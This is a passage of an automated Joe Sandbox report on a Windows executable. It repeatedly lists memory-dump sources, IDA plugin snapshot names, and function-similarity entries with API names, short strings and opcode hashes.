                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$mallocmemcpysqrtf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 943526449-0
                                                                                                                                                                        • Opcode ID: a3de923a97fbd1606c8032885b243b605395b050d7edb045275b896e87af2970
                                                                                                                                                                        • Instruction ID: 5653d1dd3ed3eded7e8238cdc60169ab7b3257381b74629e5825a1480a22624b
                                                                                                                                                                        • Opcode Fuzzy Hash: a3de923a97fbd1606c8032885b243b605395b050d7edb045275b896e87af2970
                                                                                                                                                                        • Instruction Fuzzy Hash: 4872AC13E28BE845D3139B36944267BA7D1FF6E784F29D722ED44A6662DB3CE841C700
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: cosfsinf$ControlDevice$asinatan2memsettanf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1330759842-0
                                                                                                                                                                        • Opcode ID: b96774085f17c9f433595d22a2847f99d84dae85dffc066ee90e6205e3e24cba
                                                                                                                                                                        • Instruction ID: f846b8ebfdd2b9570c26acca94d6770b620f3df10943963b299bf46b0b3c9212
                                                                                                                                                                        • Opcode Fuzzy Hash: b96774085f17c9f433595d22a2847f99d84dae85dffc066ee90e6205e3e24cba
                                                                                                                                                                        • Instruction Fuzzy Hash: 66D1F922E28FC555E213AB3564422B6E365BF6F3D5F649332E94D31666DF28A4C2CB00
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClipboardLock$Exclusive$AcquireCloseGlobalfree$DataOpenReleaseUnlockmallocmemcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2057792927-0
                                                                                                                                                                        • Opcode ID: 10ed9af3092add089846d6851fff59fe470364b03e1229adb50fa694fabddf7c
                                                                                                                                                                        • Instruction ID: 2dff768c96cff354af01f178ee42af678408c6ce4e168977b282f9c725f563e1
                                                                                                                                                                        • Opcode Fuzzy Hash: 10ed9af3092add089846d6851fff59fe470364b03e1229adb50fa694fabddf7c
                                                                                                                                                                        • Instruction Fuzzy Hash: BF5170B0B0DA82A2FB54AB55FD51277A2A2FF44B81FE44535C90E47390DE2CED81CB60
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: fmodffreemallocmemcpystrncpy
                                                                                                                                                                        • String ID: #SCROLLY
                                                                                                                                                                        • API String ID: 511038203-1064663049
                                                                                                                                                                        • Opcode ID: 54465a66662625a5de271ac05680b4630052d94b7f472e3466b3ef743cc71aab
                                                                                                                                                                        • Instruction ID: 30212018f05564905768b92d58d7a0fc89d96f728098dfdbed6ad23d5ccd3dc3
                                                                                                                                                                        • Opcode Fuzzy Hash: 54465a66662625a5de271ac05680b4630052d94b7f472e3466b3ef743cc71aab
                                                                                                                                                                        • Instruction Fuzzy Hash: E173E732F086C6A6E711BA3688412BAA792FF59384F698735DE0977191DF39EC40CF11
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemchrmemset$__stdio_common_vsnprintf_smemcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3704722475-0
                                                                                                                                                                        • Opcode ID: c35b0267b641eca2e4c6c7ee181259d97e7b1fdd9ee1529e74b068ad53242d7e
                                                                                                                                                                        • Instruction ID: 05e721547503c9ff868272a862f5d74db52430e9bdc0e1e9b414f445e99c6127
                                                                                                                                                                        • Opcode Fuzzy Hash: c35b0267b641eca2e4c6c7ee181259d97e7b1fdd9ee1529e74b068ad53242d7e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2422F132F18BC495E711DB75D8402AAB761FB98798F544332EE8D27A59DF38E984CB00
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 313767242-0
                                                                                                                                                                        • Opcode ID: f1add5d3ab2aee3b93a245a28b42dfe8f7f18b86da77bbe61d620c10ed4ab906
                                                                                                                                                                        • Instruction ID: f39dd50f20f275c2d832fed6d4df14dc7554b0cb69e9d342ed2ba1b733631f5e
                                                                                                                                                                        • Opcode Fuzzy Hash: f1add5d3ab2aee3b93a245a28b42dfe8f7f18b86da77bbe61d620c10ed4ab906
                                                                                                                                                                        • Instruction Fuzzy Hash: 34312172705BC196EB609FA1E8403EEB366FB84748F54403ADA4D57B94DF78D948CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: sqrtf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 321154650-0
                                                                                                                                                                        • Opcode ID: acb62d44f2b0c97fdc5f4c14e489ec2560aaa7e1f6ff8055ee4b6d95eee40dca
                                                                                                                                                                        • Instruction ID: dab29259462faac06420d1ae34e29e3d45a64597362b1f735548e312ff00e12e
                                                                                                                                                                        • Opcode Fuzzy Hash: acb62d44f2b0c97fdc5f4c14e489ec2560aaa7e1f6ff8055ee4b6d95eee40dca
                                                                                                                                                                        • Instruction Fuzzy Hash: 50B19222E28FCC51E223A63754821FAE250AFBF3C4F7DDB22F984756B29B2465D19510
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 453615576-0
                                                                                                                                                                        • Opcode ID: a02a1fea358fca85474d043749fc72989d88a7aaf32ba67f2ff618c2e72d0539
                                                                                                                                                                        • Instruction ID: ab9375ea5983b3dc3949043213a5dc59243e8f3395bd04d8f9f2d8a1863018ef
                                                                                                                                                                        • Opcode Fuzzy Hash: a02a1fea358fca85474d043749fc72989d88a7aaf32ba67f2ff618c2e72d0539
                                                                                                                                                                        • Instruction Fuzzy Hash: 6131E861B0864292EB10AF90FD5527BF3A1FF44B94FA84131DA4D87795DE7CE846C710
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: sqrtf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 321154650-0
                                                                                                                                                                        • Opcode ID: 1104c4011e120cab93afc595fa221a2d93fd4c7fb9e16c450bdba6d161c1d9e2
                                                                                                                                                                        • Instruction ID: eb4a2efe3cb43e81c177ef46f9fded3989d9994893e8facb54a4c2433b39cfb9
                                                                                                                                                                        • Opcode Fuzzy Hash: 1104c4011e120cab93afc595fa221a2d93fd4c7fb9e16c450bdba6d161c1d9e2
                                                                                                                                                                        • Instruction Fuzzy Hash: EE923A33A24B889AD712CF37C4811A9B760FF6D784729DB16EA0927761DB34F5A4DB00
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: sqrtf
                                                                                                                                                                        • String ID: (
                                                                                                                                                                        • API String ID: 321154650-3887548279
                                                                                                                                                                        • Opcode ID: e6541b364bb36a7699e93789c0e8fd92e819369f602ca6f75acf4ebdd433bf80
                                                                                                                                                                        • Instruction ID: e8add87b2082478fde69468485e31069cb254720fa689a2b2b1b1e2ea0b05c15
                                                                                                                                                                        • Opcode Fuzzy Hash: e6541b364bb36a7699e93789c0e8fd92e819369f602ca6f75acf4ebdd433bf80
                                                                                                                                                                        • Instruction Fuzzy Hash: DE129133924BC896D312DF3694422ADB361FF6E788B69D712EA0833665DF34B5A1D700
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: freemallocmemchrmemcpy
                                                                                                                                                                        • String ID: %*s%.*s$ %.*s$#CLOSE$#COLLAPSE
                                                                                                                                                                        • API String ID: 3682640872-4275869412
                                                                                                                                                                        • Opcode ID: 1dfc8e3fe16d2856ec6161909734e3167949ebc42c32983c84b840a048b68aba
                                                                                                                                                                        • Instruction ID: ebe4fbf6696355252be3a03804969df9e50ca99b412cdd60dff7fd9175fda7a3
                                                                                                                                                                        • Opcode Fuzzy Hash: 1dfc8e3fe16d2856ec6161909734e3167949ebc42c32983c84b840a048b68aba
                                                                                                                                                                        • Instruction Fuzzy Hash: 4792D632A04BC5ABE715DB36C9412EAB3A0FF59344F588735DB28675A1DB38F464CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1671641884-0
                                                                                                                                                                        • Opcode ID: 4e6de67f0b199593fece58cbb396463285ac8eedda3d6f725b53e0abb1701a6d
                                                                                                                                                                        • Instruction ID: d85bbdbfe5e2973b4d734712d9aeabf7982d5d5aa80c69a20e678f8e91a44994
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e6de67f0b199593fece58cbb396463285ac8eedda3d6f725b53e0abb1701a6d
                                                                                                                                                                        • Instruction Fuzzy Hash: 6AD1E332A09BC596E7619F26D4416AAF3B0FF58784F688331DB4867364EF38E951CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: powf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3445610689-0
                                                                                                                                                                        • Opcode ID: 576af0b28d588663c10d82af8adbdc4f60bc88079ffab9676754ae1bf05fc4ff
                                                                                                                                                                        • Instruction ID: 9bb5065a1a5629d18216c4db97ddd086223bdbfda1567ccdc7abeb97b3f72d01
                                                                                                                                                                        • Opcode Fuzzy Hash: 576af0b28d588663c10d82af8adbdc4f60bc88079ffab9676754ae1bf05fc4ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 99124C22F09BC955E613B63754022B6E2527F6E7C0F68CB32ED4D362A1DF397881CA11
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memchr
                                                                                                                                                                        • String ID: ...
                                                                                                                                                                        • API String ID: 3297308162-440645147
                                                                                                                                                                        • Opcode ID: fdaf0be1249e45e5ef8dd74c920ee991e5ae9930adbc7f2a45375590b4e4af0e
                                                                                                                                                                        • Instruction ID: acbc30d20b6c6ed4bf52db745b66573d9d5ddcc2ae02b56f05d76e3280a6b0f0
                                                                                                                                                                        • Opcode Fuzzy Hash: fdaf0be1249e45e5ef8dd74c920ee991e5ae9930adbc7f2a45375590b4e4af0e
                                                                                                                                                                        • Instruction Fuzzy Hash: 9BF11232E087CA91E252A73794013F6F351FF6D785F589732EA48761A1DF79A981CB00
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: powf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3445610689-0
                                                                                                                                                                        • Opcode ID: ad17c0d7de902934bc31f17f45a20e81569974ba89a57bd936ff430ac94c5371
                                                                                                                                                                        • Instruction ID: bca32d453ad634d8e7de9b178b650cc1c1fc38f7541dd6eeb9349122b596a602
                                                                                                                                                                        • Opcode Fuzzy Hash: ad17c0d7de902934bc31f17f45a20e81569974ba89a57bd936ff430ac94c5371
                                                                                                                                                                        • Instruction Fuzzy Hash: EBE11922E087DD55E213B73768421B7E752BFAE784F6C8B32ED48312A1DB297981C911
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: powf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3445610689-0
                                                                                                                                                                        • Opcode ID: 5377f22ed5d838f2895b7faaba13ee2eec79f3aadfd082452500dc4e195f3568
                                                                                                                                                                        • Instruction ID: 4eb8871041b83da1601d5cf8b9a5dc08c3f5dbc30fc0b5298ff564d26dc3d1bf
                                                                                                                                                                        • Opcode Fuzzy Hash: 5377f22ed5d838f2895b7faaba13ee2eec79f3aadfd082452500dc4e195f3568
                                                                                                                                                                        • Instruction Fuzzy Hash: 26E11C32F187CD95E262B73764421BAE351BF6E384F6D8B32ED4872161DF297880CA11
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
